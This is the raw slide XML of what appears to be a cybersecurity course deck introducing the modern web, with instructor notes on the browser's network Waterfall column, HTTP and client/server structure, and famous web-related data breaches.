              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - The **Waterfall** column specifies when a request was initiated, and when it was fulfilled, relative to other requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Call attention to the Waterfall column.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Explain that the waterfall column contains a lot of valuable information. The most importance pieces for our purposes are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - When the request was sent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - How long it took to receive the response (**TTFB**, or Time To First Byte)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - How long it took to download the full response body after receiving the response header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Let students know that the Waterfall column is useful for the following tasks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Identifying sources of latency (i.e., finding responses that aren't being fulfilled as quickly as they should be)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Testing how quickly a server responds to different kinds of requests (useful for penetration testing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Remind students that JavaScript can also send network requests, and that these will show up in the Waterfall chart, as well.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Explain that each of the files listed in the inspector and waterfall chart was requested by the browser in response to one of the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - A link in the HTML page that caused the browser to load the resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Running JavaScript that sent a request for the file after the page was loaded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Take a moment to address remaining questions before proceeding.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F4EE911A-504C-45E1-9DD1-A7318D673F80}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2581454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Call attention to the Waterfall column.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that the waterfall column contains a lot of valuable information. The most importance pieces for our purposes are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - When the request was sent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - How long it took to receive the response (**TTFB**, or Time To First Byte)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - How long it took to download the full response body after receiving the response header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Let students know that the Waterfall column is useful for the following tasks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Identifying sources of latency (i.e., finding responses that aren't being fulfilled as quickly as they should be)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Testing how quickly a server responds to different kinds of requests (useful for penetration testing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Remind students that JavaScript can also send network requests, and that these will show up in the Waterfall chart, as well.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that each of the files listed in the inspector and waterfall chart was requested by the browser in response to one of the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - A link in the HTML page that caused the browser to load the resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Running JavaScript that sent a request for the file after the page was loaded</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F4EE911A-504C-45E1-9DD1-A7318D673F80}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4216987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Slack out the instructions in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Stu_Resource_Loading_in_Action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F4EE911A-504C-45E1-9DD1-A7318D673F80}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2890708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Open and explain the solution in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Stu_Resource_Loading_in_Action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/Solved/README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F4EE911A-504C-45E1-9DD1-A7318D673F80}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263733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Finally, emphasize that the stakes of failing to protect this data are high.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Explain that this chart includes statistics detailing the impact of major breaches against the networks of large organizations (the “M” in the right column stands for “millions”).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Not all of these breaches were due to exploitation of web servers, but many were: Equifax was due to an Apache Struts vulnerability; Heartland Payment Systems was due to a SQL Injection vulnerability; and Uber was due to exposed AWS credentials being stored on an internally maintained GitHub account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>With compromised user accounts and leaked credit card numbers totaling in the hundreds of millions, and the monetary cost of breaches on occasion exceeding hundreds of millions (Yahoo!), or even billions (Uber, partially attributable to their handling of the breach), it’s clear that the web is one of the most important of an organization’s exposed surfaces to secure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>[Quote attributed to Scott </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Vernick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>: https://www.thestreet.com/story/14431727/1/uber-s-rough-road-leads-to-softbank-deal.html]</a:t>
            </a:r>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589722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next activity will have students research some of the breaches mentioned in the previous slide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Emphasize that we’ll discuss the questions posed in the provided README, so students should record their answers and be prepared to share.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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592120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Open the solutions in Activities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Stu_Exposure_on_the_Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>/Solved/README.md, and talk through the answers to each question.</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309205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735266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12/5/18</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target.com/"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www.target.com/"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www.target.com/"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example.com/"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example.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en-US/docs/Web/Security/Same-origin_policy"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mozilla.org/en-US/docs/Web/Security/Same-origin_policy"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www.target.com/"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bit.ly/2p8t5fC"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bit.ly/2x1axDI" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ubm.io/2CUYN9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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduction to the Modern Web</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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unit 11.1</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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118568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F928E86-365C-4CF4-B700-AFE986FFA534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2459504"/>
            <a:ext cx="8686800" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exposure </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discussion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42225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629400" cy="704060"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Structure of the Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4221524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0482-A907-504B-9D4F-CFD3076D5A90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What We’ll Cover in This Section: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB1F3676-8BEF-1246-983D-C6C20FCD5F4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1219200"/>
            <a:ext cx="6324600" cy="1785104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>- The network structure of the Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>  - Client/Server architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>  - HTTP, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1"/>
              <a:t>HyperText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t> Transfer Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="657114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695CB0-3F72-47D6-96AC-99D64F6F623E}"/>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BAC7F3-1283-4AAC-8A8A-5DAA011AC547}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="164383" y="2590800"/>
            <a:ext cx="9057288" cy="1138773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“Internet”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>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862310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D683EF-B0EC-48B7-893E-3A43D47BD95C}"/>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8722BEC-FEAC-4029-BB5C-4DD15E42F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4631" y="1513321"/>
            <a:ext cx="3882370" cy="3744479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400" cap="rnd">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:shade val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C2EC7C0-366F-46E7-A300-4C06BA7FDEFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1197454" y="392668"/>
            <a:ext cx="7297319" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB9CEEB0-CF49-4137-A63A-DDE526EE41C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1004357" y="5372105"/>
            <a:ext cx="7135287" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…And </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>just</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" b="1" dirty="0">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4349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5D836E-BE90-4073-B788-53CAD43822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55" y="304800"/>
            <a:ext cx="8737490" cy="4495800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E009BC50-448D-4B05-89D1-299E55456545}"/>
              </a:ext>
